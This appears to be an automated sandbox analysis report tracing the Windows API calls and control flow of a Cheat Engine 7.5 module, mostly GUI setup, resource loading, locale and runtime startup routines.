                                                                                                                                                                                                                                      execution_graph 38934 6b4e2aac 38935 6b4e2ac2 38934->38935 38936 6b4e2abb 38934->38936 38938 6b4fcc10 38936->38938 38939 6b4fcc31 _memcpy_s 38938->38939 38948 6b4fccb8 38938->38948 38942 6b4fcc61 VerSetConditionMask VerSetConditionMask VerifyVersionInfoW GetSystemMetrics 38939->38942 38941 6b4fcccb 38941->38935 38949 6b4fd5a0 38942->38949 38944 6b4fccaa 39026 6b4fd06c 38944->39026 39114 6b60038c 38948->39114 39121 6b600c5f 38949->39121 38951 6b4fd5ac GetSysColor 38952 6b4fd5c1 GetSysColor 38951->38952 38953 6b4fd5cd GetSysColor 38951->38953 38952->38953 38955 6b4fd5f0 38953->38955 38956 6b4fd5e4 GetSysColor 38953->38956 39122 6b4d4bd7 38955->39122 38956->38955 38958 6b4fd606 22 API calls 38959 6b4fd739 GetSysColor 38958->38959 38960 6b4fd730 38958->38960 38961 6b4fd74b GetSysColorBrush 38959->38961 38960->38961 38962 6b4fd9b8 38961->38962 38963 6b4fd767 GetSysColorBrush 38961->38963 39160 6b4cef3e RaiseException std::_Xinvalid_argument 38962->39160 38963->38962 38964 6b4fd77a GetSysColorBrush 38963->38964 38964->38962 38966 6b4fd78d 38964->38966 39130 6b4d57bf 38966->39130 38969 6b4fd79a CreateSolidBrush 39135 6b4d56b8 38969->39135 38972 6b4d57bf 77 API calls 38973 6b4fd7b8 CreateSolidBrush 38972->38973 38974 6b4d56b8 76 API calls 38973->38974 38975 6b4fd7c9 38974->38975 38976 6b4d57bf 77 API calls 38975->38976 38977 6b4fd7d6 CreateSolidBrush 38976->38977 38978 6b4d56b8 76 API calls 38977->38978 38979 6b4fd7e7 38978->38979 38980 6b4d57bf 77 API calls 38979->38980 38981 6b4fd7f4 CreateSolidBrush 38980->38981 38982 6b4d56b8 76 API calls 38981->38982 38983 6b4fd808 38982->38983 38984 6b4d57bf 77 API calls 38983->38984 38985 6b4fd815 CreateSolidBrush 38984->38985 38986 6b4d56b8 76 API calls 38985->38986 38987 6b4fd826 38986->38987 38988 6b4d57bf 77 API calls 38987->38988 38989 6b4fd833 CreateSolidBrush 38988->38989 38990 6b4d56b8 76 API calls 38989->38990 38991 6b4fd844 38990->38991 38992 6b4d57bf 77 API calls 38991->38992 38993 6b4fd851 CreateSolidBrush 38992->38993 38994 6b4d56b8 76 API calls 38993->38994 38995 6b4fd862 38994->38995 38996 6b4d57bf 77 API calls 38995->38996 38997 6b4fd86f CreatePen 38996->38997 38998 6b4d56b8 76 API calls 38997->38998 38999 6b4fd888 38998->38999 39000 6b4d57bf 77 API calls 38999->39000 39001 6b4fd895 CreatePen 39000->39001 39002 6b4d56b8 76 API calls 39001->39002 39003 6b4fd8ac 39002->39003 39004 6b4d57bf 77 API calls 39003->39004 39005 6b4fd8b9 CreatePen 39004->39005 39006 6b4d56b8 76 API calls 39005->39006 39007 6b4fd8d0 39006->39007 39008 6b4fd8e7 39007->39008 39013 6b4d57bf 77 API calls 39007->39013 39009 6b4fd954 39008->39009 39010 6b4fd8f0 CreateSolidBrush 39008->39010 39158 6b4fc668 7 API calls 2 library calls 39009->39158 39011 6b4d56b8 76 API calls 39010->39011 39014 6b4fd952 39011->39014 39013->39008 39141 6b52d9a3 39014->39141 39015 6b4fd95e 39015->38962 39016 6b4fd962 39015->39016 39017 6b4d56b8 76 API calls 39016->39017 39019 6b4fd97b CreatePatternBrush 39017->39019 39021 6b4d56b8 76 API calls 39019->39021 39023 6b4fd98c 39021->39023 39159 6b4d4ce2 77 API calls _ValidateLocalCookies 39023->39159 39024 6b4fd9b2 std::locale::_Init 39024->38944 39027 6b4fd07b __EH_prolog3_GS 39026->39027 39028 6b4d4bd7 77 API calls 39027->39028 39029 6b4fd08a GetDeviceCaps 39028->39029 39030 6b4fd0cb 39029->39030 39032 6b4fd106 39030->39032 39191 6b4d5812 76 API calls 39030->39191 39031 6b4fd124 39033 6b4fd142 39031->39033 39193 6b4d5812 76 API calls 39031->39193 39032->39031 39192 6b4d5812 76 API calls 39032->39192 39035 6b4fd160 39033->39035 39194 6b4d5812 76 API calls 39033->39194 39040 6b4fd17e 39035->39040 39195 6b4d5812 76 API calls 39035->39195 39036 6b4fd0ff DeleteObject 39036->39032 39038 6b4fd11d DeleteObject 39038->39031 39041 6b4fd19c 39040->39041 39196 6b4d5812 76 API calls 39040->39196 39044 6b4fd1ba 39041->39044 39197 6b4d5812 76 API calls 39041->39197 39042 6b4fd13b DeleteObject 39042->39033 39048 6b4fd1d8 39044->39048 39198 6b4d5812 76 API calls 39044->39198 39045 6b4fd159 DeleteObject 39045->39035 39050 6b4fd1f6 39048->39050 39199 6b4d5812 76 API calls 39048->39199 39049 6b4fd177 DeleteObject 39049->39040 39053 6b4fd214 39050->39053 39200 6b4d5812 76 API calls 39050->39200 39051 6b4fd195 DeleteObject 39051->39041 39188 6b4fcb63 39053->39188 39054 6b4fd1b3 DeleteObject 39054->39044 39058 6b4fd1d1 DeleteObject 39058->39048 39059 6b4fd1ef DeleteObject 39059->39050 39061 6b4fd22c _memcpy_s 39063 6b4fd239 GetTextCharsetInfo 39061->39063 39062 6b4fd20d DeleteObject 39062->39053 39064 6b4fd271 lstrcpyW 39063->39064 39066 6b4fd30e CreateFontIndirectW 39064->39066 39067 6b4fd2a2 39064->39067 39069 6b4d56b8 76 API calls 39066->39069 39067->39066 39068 6b4fd2ab EnumFontFamiliesW 39067->39068 39070 6b4fd2dc EnumFontFamiliesW 39068->39070 39071 6b4fd2c7 lstrcpyW 39068->39071 39074 6b4fd320 39069->39074 39072 6b4fd2fb lstrcpyW 39070->39072 39071->39066 39072->39066 39075 6b4fd35f CreateFontIndirectW 39074->39075 39076 6b4d56b8 76 API calls 39075->39076 39077 6b4fd371 39076->39077 39078 6b4fcb63 SystemParametersInfoW 39077->39078 39079 6b4fd38c CreateFontIndirectW 39078->39079 39080 6b4d56b8 76 API calls 39079->39080 39081 6b4fd3b4 CreateFontIndirectW 39080->39081 39082 6b4d56b8 76 API calls 39081->39082 39083 6b4fd3e0 CreateFontIndirectW 39082->39083 39084 6b4d56b8 76 API calls 39083->39084 39085 6b4fd401 GetSystemMetrics lstrcpyW CreateFontIndirectW 39084->39085 39086 6b4d56b8 76 API calls 39085->39086 39087 6b4fd43d GetStockObject 39086->39087 39088 6b4fd467 GetObjectW 39087->39088 39089 6b4fd4e0 GetStockObject 39087->39089 39088->39089 39090 6b4fd478 lstrcpyW CreateFontIndirectW 39088->39090 39201 6b4d5917 76 API calls 39089->39201 39092 6b4d56b8 76 API calls 39090->39092 39094 6b4fd4c7 CreateFontIndirectW 39092->39094 39096 6b4d56b8 76 API calls 39094->39096 39096->39089 39115 6b600394 39114->39115 39116 6b600395 IsProcessorFeaturePresent 39114->39116 39115->38941 39118 6b60109d 39116->39118 39202 6b601060 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39118->39202 39120 6b601180 39120->38941 39121->38951 39123 6b4d4be3 __EH_prolog3 39122->39123 39124 6b4d4c06 GetWindowDC 39123->39124 39161 6b4d5676 39124->39161 39127 6b4d4c1c std::locale::_Init 39127->38958 39131 6b4d57c8 39130->39131 39132 6b4d57c5 39130->39132 39170 6b4d5812 76 API calls 39131->39170 39132->38969 39134 6b4d57cd DeleteObject 39134->38969 39136 6b4d56da 39135->39136 39137 6b4d56c5 39135->39137 39136->38972 39171 6b4d61f7 76 API calls 4 library calls 39137->39171 39139 6b4d56cf 39172 6b4d475d RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 39139->39172 39142 6b52d9ac 39141->39142 39152 6b4fd9a0 39141->39152 39142->39152 39173 6b4fef0c 25 API calls __DllMainCRTStartup@12 39142->39173 39144 6b52d9bf 39174 6b4fef0c 25 API calls __DllMainCRTStartup@12 39144->39174 39146 6b52d9c9 39175 6b4fef0c 25 API calls __DllMainCRTStartup@12 39146->39175 39148 6b52d9d3 39176 6b4fef0c 25 API calls __DllMainCRTStartup@12 39148->39176 39150 6b52d9dd 39177 6b4fef0c 25 API calls __DllMainCRTStartup@12 39150->39177 39153 6b4d4e52 39152->39153 39178 6b4d57d5 39153->39178 39155 6b4d4e82 ReleaseDC 39182 6b4d4c96 39155->39182 39158->39015 39159->39014 39162 6b4d5683 39161->39162 39166 6b4d4c18 39161->39166 39168 6b4d6184 76 API calls 4 library calls 39162->39168 39164 6b4d568e 39169 6b4d475d RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 39164->39169 39166->39127 39167 6b4d5642 RaiseException std::_Xinvalid_argument 39166->39167 39168->39164 39169->39166 39170->39134 39171->39139 39172->39136 39173->39144 39174->39146 39175->39148 39176->39150 39177->39152 39179 6b4d57e1 39178->39179 39181 6b4d57e8 39178->39181 39187 6b4d6184 76 API calls 4 library calls 39179->39187 39181->39155 39183 6b4d4cc4 39182->39183 39184 6b4d4cd0 39182->39184 39185 6b4d57d5 76 API calls 39183->39185 39184->39024 39186 6b4d4cc9 DeleteDC 39185->39186 39186->39184 39187->39181 39189 6b4fcb72 SystemParametersInfoW 39188->39189 39189->39061 39191->39036 39192->39038 39193->39042 39194->39045 39195->39049 39196->39051 39197->39054 39198->39058 39199->39059 39200->39062 39202->39120 39203 6b4d0e1e GetModuleFileNameW 39204 6b4d0e4c 39203->39204 39208 6b4d0e82 39203->39208 39205 6b4d0e50 PathFindExtensionW 39204->39205 39204->39208 39210 6b4d0911 39205->39210 39206 6b60038c _ValidateLocalCookies 5 API calls 39209 6b4d0e92 39206->39209 39208->39206 39211 6b4d0920 __EH_prolog3_GS 39210->39211 39224 6b4c65c0 39211->39224 39214 6b4c65c0 80 API calls 39215 6b4d0942 _memcpy_s 39214->39215 39234 6b4d8cd8 39215->39234 39218 6b4d09a5 39221 6b4d09c5 __DllMainCRTStartup@12 39218->39221 39267 6b4d1540 39218->39267 39289 6b600c41 5 API calls _ValidateLocalCookies 39221->39289 39225 6b4c65ef __DllMainCRTStartup@12 39224->39225 39226 6b4c664f 39225->39226 39227 6b4c65f5 39225->39227 39311 6b4c28c0 24 API calls __DllMainCRTStartup@12 39226->39311 39290 6b4c6430 39227->39290 39229 6b4c6659 39231 6b4c663a 39231->39214 39235 6b4d8d06 GetModuleHandleW 39234->39235 39236 6b4d8d31 DecodePointer 39234->39236 39237 6b4d8d15 GetProcAddress EncodePointer 39235->39237 39238 6b4d8d56 GetUserDefaultUILanguage 39235->39238 39239 6b4d8d3a 39236->39239 39237->39239 39318 6b4d913b 39 API calls 2 library calls 39238->39318 39239->39238 39243 6b4d8d3e 39239->39243 39241 6b4d8d71 __DllMainCRTStartup@12 39319 6b60a5d6 39 API calls 2 library calls 39241->39319 39246 6b60038c _ValidateLocalCookies 5 API calls 39243->39246 39244 6b4d8d8b 39320 6b4d913b 39 API calls 2 library calls 39244->39320 39248 6b4d0986 39246->39248 39247 6b4d8da0 __DllMainCRTStartup@12 39321 6b60a5d6 39 API calls 2 library calls 39247->39321 39248->39218 39263 6b4d1507 39248->39263 39250 6b4d8dc4 GetSystemDefaultUILanguage 39322 6b4d913b 39 API calls 2 library calls 39250->39322 39252 6b4d8dde __DllMainCRTStartup@12 39323 6b60a5d6 39 API calls 2 library calls 39252->39323 39254 6b4d8e02 39324 6b4d913b 39 API calls 2 library calls 39254->39324 39256 6b4d8e16 __DllMainCRTStartup@12 39325 6b60a5d6 39 API calls 2 library calls 39256->39325 39258 6b4d8e3a 39326 6b4d913b 39 API calls 2 library calls 39258->39326 39260 6b4d8e4c __DllMainCRTStartup@12 39327 6b60a5d6 39 API calls 2 library calls 39260->39327 39262 6b4d8e6f 39262->39243 39266 6b4d1513 __DllMainCRTStartup@12 39263->39266 39265 6b4d1538 39265->39218 39266->39265 39328 6b4d143e 39266->39328 39268 6b6060ad __dosmaperr 14 API calls 39267->39268 39269 6b4d155e 39268->39269 39270 6b6060ad __dosmaperr 14 API calls 39269->39270 39271 6b4d1565 39270->39271 39272 6b4ce0a9 __snprintf_s 51 API calls 39271->39272 39273 6b4d1588 39272->39273 39274 6b6060ad __dosmaperr 14 API calls 39273->39274 39275 6b4d1592 39274->39275 39276 6b4d15a5 39275->39276 39277 6b4d1596 39275->39277 39279 6b6060ad __dosmaperr 14 API calls 39276->39279 39278 6b6060ad __dosmaperr 14 API calls 39277->39278 39280 6b4d159b 39278->39280 39283 6b4d15a2 39279->39283 39417 6b4c7939 24 API calls __DllMainCRTStartup@12 39280->39417 39282 6b4d15db 39284 6b60038c _ValidateLocalCookies 5 API calls 39282->39284 39283->39282 39285 6b4cdba5 15 API calls 39283->39285 39286 6b4d15ec 39284->39286 39287 6b4d15c8 39285->39287 39286->39221 39287->39282 39288 6b4cdba5 15 API calls 39287->39288 39288->39282 39291 6b4c6444 39290->39291 39307 6b4c652b 39290->39307 39291->39307 39312 6b4d03e6 76 API calls __DllMainCRTStartup@12 39291->39312 39293 6b4c645a 39294 6b4c6467 FindResourceW 39293->39294 39293->39307 39295 6b4c6482 LoadResource 39294->39295 39294->39307 39296 6b4c6492 LockResource 39295->39296 39295->39307 39297 6b4c64a3 SizeofResource 39296->39297 39296->39307 39298 6b4c64b7 39297->39298 39298->39307 39313 6b4c25c0 39 API calls __DllMainCRTStartup@12 39298->39313 39300 6b4c64f5 39314 6b60652c 39 API calls 4 library calls 39300->39314 39302 6b4c650e 39304 6b4c6548 39302->39304 39305 6b4c6524 39302->39305 39315 6b4cef3e RaiseException std::_Xinvalid_argument 39302->39315 39316 6b4cef58 RaiseException std::_Xinvalid_argument 39304->39316 39305->39307 39317 6b4c28c0 24 API calls __DllMainCRTStartup@12 39305->39317 39307->39231 39310 6b4c2790 49 API calls 4 library calls 39307->39310 39309 6b4c6557 39310->39231 39311->39229 39312->39293 39313->39300 39314->39302 39317->39309 39318->39241 39319->39244 39320->39247 39321->39250 39322->39252 39323->39254 39324->39256 39325->39258 39326->39260 39327->39262 39352 6b4d8c5f 39328->39352 39333 6b60038c _ValidateLocalCookies 5 API calls 39335 6b4d1505 39333->39335 39334 6b6060ad __dosmaperr 14 API calls 39336 6b4d147f 39334->39336 39335->39266 39362 6b4ce0a9 39336->39362 39339 6b6060ad __dosmaperr 14 API calls 39340 6b4d14ab 39339->39340 39341 6b4d14af 39340->39341 39342 6b4d14be 39340->39342 39344 6b6060ad __dosmaperr 14 API calls 39341->39344 39343 6b6060ad __dosmaperr 14 API calls 39342->39343 39346 6b4d14bb 39343->39346 39345 6b4d14b4 39344->39345 39372 6b4c7939 24 API calls __DllMainCRTStartup@12 39345->39372 39351 6b4d14f5 39346->39351 39365 6b4cdba5 39346->39365 39350 6b4cdba5 15 API calls 39350->39351 39351->39333 39353 6b4d8c6c GetModuleHandleW 39352->39353 39354 6b4d8c97 DecodePointer 39352->39354 39355 6b4d8c7b GetProcAddress EncodePointer 39353->39355 39356 6b4d8ca0 39353->39356 39354->39356 39355->39356 39357 6b4d8ccd GetLocaleInfoW 39356->39357 39358 6b4d1467 39356->39358 39357->39358 39358->39351 39359 6b6060ad 39358->39359 39373 6b616113 14 API calls 2 library calls 39359->39373 39361 6b4d1478 39361->39334 39374 6b4ce0c8 39362->39374 39368 6b4cdbb1 ___scrt_is_nonwritable_in_current_image 39365->39368 39366 6b4cdbd8 LoadLibraryExW 39407 6b4cdc13 39366->39407 39368->39366 39415 6b4cdcf9 12 API calls __DllMainCRTStartup@12 39368->39415 39370 6b4cdbfc 39370->39350 39370->39351 39371 6b4cdbd4 39371->39366 39371->39370 39372->39346 39373->39361 39375 6b4ce0e2 __vswprintf_c_l 39374->39375 39378 6b60a47a 39375->39378 39379 6b60a48e __vsnwprintf_s_l 39378->39379 39384 6b607d8f 39379->39384 39385 6b607da1 39384->39385 39387 6b607dc4 39384->39387 39401 6b605f32 39 API calls 3 library calls 39385->39401 39388 6b607e2a 39387->39388 39389 6b607e0c 39387->39389 39394 6b607dd4 39387->39394 39403 6b607ea1 51 API calls 2 library calls 39388->39403 39402 6b607ea1 51 API calls 2 library calls 39389->39402 39393 6b607db9 39395 6b605ceb 39393->39395 39394->39393 39404 6b605f32 39 API calls 3 library calls 39394->39404 39396 6b605cf7 39395->39396 39397 6b605d0e 39396->39397 39405 6b605d96 39 API calls 2 library calls 39396->39405 39399 6b4ce0c3 39397->39399 39406 6b605d96 39 API calls 2 library calls 39397->39406 39399->39339 39401->39393 39402->39394 39403->39394 39404->39393 39405->39397 39406->39399 39408 6b4cdc1c 39407->39408 39409 6b4cdc51 39408->39409 39410 6b4cdc3a 39408->39410 39411 6b4cdc30 GetLastError 39408->39411 39409->39370 39416 6b4cd9a1 DeactivateActCtx DeactivateActCtx GetProcAddress __DllMainCRTStartup@12 39410->39416 39411->39410 39413 6b4cdc46 39413->39409 39414 6b4cdc4a SetLastError 39413->39414 39414->39409 39415->39371 39416->39413 39417->39283 39418 6b6008ca 39419 6b6008d5 39418->39419 39420 6b600908 39418->39420 39422 6b6008fa 39419->39422 39423 6b6008da 39419->39423 39446 6b600a24 174 API calls 4 library calls 39420->39446 39430 6b60091d 39422->39430 39425 6b6008f0 39423->39425 39426 6b6008df 39423->39426 39445 6b600651 23 API calls 39425->39445 39429 6b6008e4 39426->39429 39444 6b600670 21 API calls 39426->39444 39431 6b600929 ___scrt_is_nonwritable_in_current_image 39430->39431 39447 6b6006e1 39431->39447 39433 6b600930 __DllMainCRTStartup@12 39434 6b600957 39433->39434 39435 6b600a1c 39433->39435 39441 6b600993 ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 39433->39441 39455 6b600643 39434->39455 39463 6b601464 4 API calls 2 library calls 39435->39463 39438 6b600a23 39439 6b600966 __RTC_Initialize 39439->39441 39458 6b6017fc InitializeSListHead 39439->39458 39441->39429 39442 6b600974 39442->39441 39459 6b600618 39442->39459 39444->39429 39445->39429 39446->39429 39448 6b6006ea 39447->39448 39464 6b601587 IsProcessorFeaturePresent 39448->39464 39450 6b6006f6 39465 6b604830 10 API calls 2 library calls 39450->39465 39452 6b6006fb 39453 6b6006ff 39452->39453 39466 6b604865 7 API calls 2 library calls 39452->39466 39453->39433 39467 6b60071a 39455->39467 39457 6b60064a 39457->39439 39458->39442 39460 6b60061d ___scrt_release_startup_lock 39459->39460 39462 6b600626 39460->39462 39474 6b601587 IsProcessorFeaturePresent 39460->39474 39462->39441 39463->39438 39464->39450 39465->39452 39466->39453 39468 6b600726 39467->39468 39469 6b60072a 39467->39469 39468->39457 39472 6b600737 ___scrt_release_startup_lock 39469->39472 39473 6b601464 4 API calls 2 library calls 39469->39473 39471 6b6007a0 39472->39457 39473->39471 39474->39462 39475 6b600c0a 39476 6b600c13 39475->39476 39477 6b600c18 39475->39477 39496 6b6017b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 39476->39496 39481 6b600ad4 39477->39481 39484 6b600ae0 ___scrt_is_nonwritable_in_current_image 39481->39484 39482 6b600aef 39483 6b600b09 dllmain_raw 39483->39482 39486 6b600b23 dllmain_crt_dispatch 39483->39486 39484->39482 39484->39483 39485 6b600b04 39484->39485 39497 6b4c6814 39485->39497 39486->39482 39486->39485 39488 6b600b44 39489 6b600b75 39488->39489 39492 6b4c6814 __DllMainCRTStartup@12 119 API calls 39488->39492 39489->39482 39490 6b600b7e dllmain_crt_dispatch 39489->39490 39490->39482 39491 6b600b91 dllmain_raw 39490->39491 39491->39482 39493 6b600b5c 39492->39493 39533 6b600a24 174 API calls 4 library calls 39493->39533 39495 6b600b6a dllmain_raw 39495->39489 39496->39477 39498 6b4c684c 39497->39498 39499 6b4c6820 39497->39499 39504 6b4c685f 39498->39504 39505 6b4c68c5 39498->39505 39500 6b4c6828 39499->39500 39501 6b4c683a 39499->39501 39545 6b4d0251 39500->39545 39503 6b4c682d 39501->39503 39550 6b4c6852 119 API calls __DllMainCRTStartup@12 39501->39550 39503->39488 39534 6b4d3c77 SetErrorMode SetErrorMode 39504->39534 39506 6b4c68c9 39505->39506 39507 6b4c6903 39505->39507 39510 6b4d0251 __DllMainCRTStartup@12 76 API calls 39506->39510 39529 6b4c6879 __DllMainCRTStartup@12 39507->39529 39557 6b4d4262 76 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 39507->39557 39517 6b4c68ce 39510->39517 39513 6b4c687b 39516 6b4d0251 __DllMainCRTStartup@12 76 API calls 39513->39516 39514 6b4c6874 39551 6b4d3f83 97 API calls 2 library calls 39514->39551 39519 6b4c6881 39516->39519 39554 6b4d4262 76 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 39517->39554 39518 6b4c690d 39558 6b4d426b 77 API calls 4 library calls 39518->39558 39523 6b4c68b5 39519->39523 39531 6b4c689d 39519->39531 39522 6b4c68eb 39555 6b4d426b 77 API calls 4 library calls 39522->39555 39553 6b4d35fa EnterCriticalSection LeaveCriticalSection 39523->39553 39524 6b4c6914 39559 6b4d19e9 84 API calls 4 library calls 39524->39559 39528 6b4c68f2 39556 6b4d3f83 97 API calls 2 library calls 39528->39556 39529->39488 39552 6b4d3f83 97 API calls 2 library calls 39531->39552 39533->39495 39535 6b4d0251 __DllMainCRTStartup@12 76 API calls 39534->39535 39536 6b4d3c94 39535->39536 39537 6b4d0251 __DllMainCRTStartup@12 76 API calls 39536->39537 39538 6b4d3ca2 39537->39538 39539 6b4d3cbd 39538->39539 39560 6b4d3cd5 39538->39560 39541 6b4d0251 __DllMainCRTStartup@12 76 API calls 39539->39541 39542 6b4d3cc2 39541->39542 39543 6b4c6870 39542->39543 39597 6b4d17ae 78 API calls __DllMainCRTStartup@12 39542->39597 39543->39513 39543->39514 39605 6b4d39ad 39545->39605 39547 6b4d027a 39547->39503 39548 6b4d0260 39548->39547 39621 6b4d3951 39548->39621 39550->39503 39551->39529 39552->39529 39553->39529 39554->39522 39555->39528 39556->39529 39557->39518 39558->39524 39559->39529 39561 6b4d0251 __DllMainCRTStartup@12 76 API calls 39560->39561 39562 6b4d3cf2 GetModuleFileNameW 39561->39562 39563 6b4d3d1a 39562->39563 39565 6b4d3d23 PathFindExtensionW 39563->39565 39602 6b4d565c RaiseException std::_Xinvalid_argument 39563->39602 39566 6b4d3d3b 39565->39566 39567 6b4d3d36 39565->39567 39598 6b4d3c32 39566->39598 39603 6b4d565c RaiseException std::_Xinvalid_argument 39567->39603 39570 6b4d3d58 39571 6b4d3d61 39570->39571 39572 6b4d565c __DllMainCRTStartup@12 RaiseException 39570->39572 39573 6b4d3d73 39571->39573 39574 6b60a713 __Getctype 42 API calls 39571->39574 39572->39571 39575 6b4d3dae 39573->39575 39577 6b4d03f1 __DllMainCRTStartup@12 80 API calls 39573->39577 39580 6b4d3e9c 39573->39580 39574->39573 39576 6b4d3de6 39575->39576 39579 6b4d03f1 __DllMainCRTStartup@12 80 API calls 39575->39579 39575->39580 39576->39580 39581 6b4d3e46 39576->39581 39585 6b60a5d6 ___crtDownlevelLCIDToLocaleName 39 API calls 39576->39585 39578 6b4d3d9b 39577->39578 39587 6b60a713 __Getctype 42 API calls 39578->39587 39583 6b4d3dd6 39579->39583 39582 6b4cef58 __DllMainCRTStartup@12 RaiseException 39580->39582 39581->39580 39584 6b4d3e8d 39581->39584 39589 6b607a08 __DllMainCRTStartup@12 39 API calls 39581->39589 39588 6b4d3ea1 39582->39588 39583->39576 39592 6b60a713 __Getctype 42 API calls 39583->39592 39586 6b60038c _ValidateLocalCookies 5 API calls 39584->39586 39590 6b4d3e34 __DllMainCRTStartup@12 39585->39590 39591 6b4d3e9a 39586->39591 39587->39575 39593 6b4d3e71 __DllMainCRTStartup@12 39589->39593 39594 6b60a713 __Getctype 42 API calls 39590->39594 39591->39539 39592->39576 39595 6b60a713 __Getctype 42 API calls 39593->39595 39594->39581 39596 6b4d3e83 39595->39596 39596->39580 39596->39584 39597->39543 39599 6b4d3c71 39598->39599 39604 6b4cef3e RaiseException std::_Xinvalid_argument 39599->39604 39608 6b4d39b9 __EH_prolog3 39605->39608 39606 6b4d3a32 39637 6b4cef3e RaiseException std::_Xinvalid_argument 39606->39637 39607 6b4d39fa 39627 6b4d3a52 EnterCriticalSection 39607->39627 39608->39606 39608->39607 39611 6b4d39ed 39608->39611 39634 6b4d3463 TlsAlloc InitializeCriticalSection RaiseException __DllMainCRTStartup@12 39608->39634 39635 6b4d3659 36 API calls 2 library calls 39611->39635 39616 6b4d39f4 39616->39606 39616->39607 39617 6b4d3a0c 39636 6b4d3afa 32 API calls 4 library calls 39617->39636 39618 6b4d3a28 std::locale::_Init 39618->39548 39619 6b4d39e0 39619->39606 39619->39611 39625 6b4d395d __EH_prolog3_catch 39621->39625 39622 6b4d398d std::locale::_Init 39622->39547 39623 6b4d3980 39644 6b4d4586 76 API calls 3 library calls 39623->39644 39625->39622 39625->39623 39638 6b4d02bd 39625->39638 39628 6b4d3a6b 39627->39628 39629 6b4d3a96 LeaveCriticalSection 39627->39629 39628->39629 39631 6b4d3a70 TlsGetValue 39628->39631 39630 6b4d3a06 39629->39630 39630->39617 39630->39618 39631->39629 39632 6b4d3a7c 39631->39632 39632->39629 39633 6b4d3a88 LeaveCriticalSection 39632->39633 39633->39630 39634->39619 39635->39616 39636->39618 39639 6b4d02c9 __EH_prolog3 39638->39639 39645 6b4d357a LocalAlloc 39639->39645 39643 6b4d02e9 std::locale::_Init 39643->39623 39644->39622 39646 6b4d02d3 39645->39646 39647 6b4d3590 39645->39647 39646->39643 39650 6b4cfea2 49 API calls 2 library calls 39646->39650 39651 6b4cef58 RaiseException std::_Xinvalid_argument 39647->39651 39650->39643 39652 6b4c3bf0 CreateToolhelp32Snapshot Process32FirstW 39653 6b4c3c59 39652->39653 39654 6b4c3c31 39652->39654 39655 6b60038c _ValidateLocalCookies 5 API calls 39653->39655 39658 6b4c3c6e 39654->39658 39659 6b4c3c4b Process32NextW 39654->39659 39662 6b6066ae 39654->39662 39657 6b4c3c68 39655->39657 39660 6b60038c _ValidateLocalCookies 5 API calls 39658->39660 39659->39653 39659->39654 39661 6b4c3c80 39660->39661 39663 6b6066bc 39662->39663 39667 6b6066df 39662->39667 39664 6b6066c2 39663->39664 39663->39667 39666 6b6060ad __dosmaperr 14 API calls 39664->39666 39669 6b6066c7 39666->39669 39673 6b6066f7 49 API calls 4 library calls 39667->39673 39668 6b6066f2 39668->39654 39672 6b605faf 39 API calls _memcpy_s 39669->39672 39671 6b6066d2 39671->39654 39672->39671 39673->39668

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 265 6b4c6180-6b4c61a3 FindResourceW 266 6b4c61a9-6b4c61b4 LoadResource 265->266 267 6b4c61a5-6b4c61a8 265->267 268 6b4c61bf-6b4c61ca LockResource 266->268 269 6b4c61b6-6b4c61be 266->269 268->269 270 6b4c61cc-6b4c61dc SizeofResource 268->270 271 6b4c61de 270->271 272 6b4c61f2-6b4c61f4 270->272 273 6b4c61e0-6b4c61e2 271->273 272->269 274 6b4c61f6-6b4c6204 272->274 273->269 275 6b4c61e4-6b4c61f0 273->275 275->272 275->273
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(00000104,?,00000006,?,00000000,?,6B4D0415,?,00000104,00000000,?,?,6B4D3DD6,0000E006,?,00000100), ref: 6B4C6198
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000104,00000000,?,?,6B4D0415,?,00000104,00000000,?,?,6B4D3DD6,0000E006,?,00000100,?,?), ref: 6B4C61AC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindLoad
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2619053042-0
                                                                                                                                                                                                                                      • Opcode ID: 4772a4624f4284c5a8d46effbad2128205ee1ea8f6f1b0fe9a8aab90c114b245
                                                                                                                                                                                                                                      • Instruction ID: db38925b887a5ac16b211635bad4b846bd61ff5cab2209f6520ea0f9c667a945
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4772a4624f4284c5a8d46effbad2128205ee1ea8f6f1b0fe9a8aab90c114b245
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5401D677F042255BDB205E69AC448B7B36CEBC4667701A527FD49D7302EA35D80047E1

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
